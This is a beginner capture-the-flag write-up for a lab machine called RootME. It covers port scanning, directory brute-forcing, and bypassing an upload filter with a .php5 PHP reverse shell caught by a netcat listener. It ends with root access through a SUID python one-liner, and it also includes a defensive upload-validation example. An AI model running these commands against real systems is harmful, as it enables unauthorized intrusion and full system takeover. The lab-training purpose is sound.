🟢RootME

A CTF for beginners, can you root me?

Questions

  • Scan the machine, how many ports are open?

  • What version of Apache is running?

  • What is the hidden directory?

  • user.txt?

  • Search for files with SUID permission, which file is weird?

  • root.txt?

Enumeration

Nmap

nmap -sSVC -A -O -vv

PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 61 OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 4a:b9:16:08:84:c2:54:48:ba:5c:fd:3f:22:5f:22:14 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC9irIQxn1jiKNjwLFTFBitstKOcP7gYt7HQsk6kyRQJjlkhHYuIaLTtt1adsWWUhAlMGl+97TsNK93DijTFrjzz4iv1Zwpt2hhSPQG0GibavCBf5GVPb6TitSskqpgGmFAcvyEFv6fLBS7jUzbG50PDgXHPNIn2WUoa2tLPSr23Di3QO9miVT3+TqdvMiphYaz0RUAD/QMLdXipATI5DydoXhtymG7Nb11sVmgZ00DPK+XJ7WB++ndNdzLW9525v4wzkr1vsfUo9rTMo6D6ZeUF8MngQQx5u4pA230IIXMXoRMaWoUgCB6GENFUhzNrUfryL02/EMt5pgfj8G7ojx5
|   256 a9:a6:86:e8:ec:96:c3:f0:03:cd:16:d5:49:73:d0:82 (ECDSA)
|_ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBERAcu0+Tsp5KwMXdhMWEbPcF5JrZzhDTVERXqFstm7WA/5+6JiNmLNSPrqTuMb2ZpJvtL9MPhhCEDu6KZ7q6rI=
80/tcp open  http    syn-ack ttl 61 Apache httpd 2.4.29 ((Ubuntu))
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: HackIT - Home

Q: Scan the machine, how many ports are open?

A: 2

Q: What version of Apache is running?

A: 2.4.29

Q: What service is running on port 22?

A: ssh

Finding directories/files

gobuster dir -u http://10.10.63.255:80/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt -t 33 -x html,php,txt

(the IP is different because I continued that writeup the other day)

Q: What is the hidden directory?

A: /panel/

Checking the directory /panel/, we find an upload page.

let's try to upload a shell

shell: https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php

curl https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php -o revs.php

remember to start a listener on a port first:

nc -lvp PORT


"PHP isn't permitted"

let's try bypassing this using the ".php5" extension

mv revs.php revs.php5


it worked

to run it, click on "veja" ("see")

it worked, we have a shell
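The upload filter above only rejects the literal ".php" extension, which is why renaming the file to ".php5" got past it. As an added defensive example (not part of the original writeup or the room), the following contrasts that blacklist style check with an allowlist check that validates every extension segment and never stores the client-supplied name; the accepted extensions and sample names are constructed for illustration.

```python
import re
import secrets

# Extensions the (constructed) image upload panel is meant to accept.
ALLOWED = {"jpg", "jpeg", "png", "gif"}

# Only simple names: letters, digits, _ and -, then one or more .ext parts.
# Path separators, NUL bytes, spaces and leading dots never match.
NAME_RE = re.compile(r"[A-Za-z0-9_-]+(\.[A-Za-z0-9]+)+")


def weak_check(filename: str) -> bool:
    """Blacklist check like the one the writeup defeats: blocks '.php' only.
    Anything else, including '.php5', is accepted."""
    return not filename.lower().endswith(".php")


def strict_check(filename: str) -> bool:
    """Allowlist check: the name must be plain and every extension segment
    must be in ALLOWED, so 'revs.php5' and 'revs.php.jpg' are both rejected."""
    if not NAME_RE.fullmatch(filename):
        return False
    segments = filename.lower().split(".")[1:]
    return all(seg in ALLOWED for seg in segments)


def storage_name(filename: str) -> str:
    """Never store under the client-supplied name: keep only the validated
    extension and generate the rest server-side. Raises on rejected input."""
    if not strict_check(filename):
        raise ValueError(f"rejected upload name: {filename!r}")
    return secrets.token_hex(16) + "." + filename.lower().rsplit(".", 1)[1]


def bypasses(names):
    """Names the blacklist accepts but the allowlist rejects."""
    return [n for n in names if weak_check(n) and not strict_check(n)]


# Constructed sample upload names, including the writeup's revs.php/.php5.
SAMPLE_NAMES = ["photo.jpg", "revs.php", "revs.PHP", "revs.php5",
                "revs.php.jpg", "../revs.jpg"]

if __name__ == "__main__":
    print("accepted by the blacklist only:", bypasses(SAMPLE_NAMES))
    print("photo.jpg stored as:", storage_name("photo.jpg"))
```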

to get a tty

python -c 'import pty;pty.spawn("/bin/bash")'

Ctrl+Z

stty raw -echo

fg

export TERM=xterm


user.txt

finding

find / -type f -name user.txt 2>/dev/null


getting

cat /var/www/user.txt


root.txt / Privilege Escalation

To look for the files with SUID permission we can use the command:

find / -type f -user root -perm -4000 2>/dev/null

Exploiting the SUID bit on python to switch to uid 0:

python -c "import os;os.setuid(0);os.system('/bin/bash')"

getting
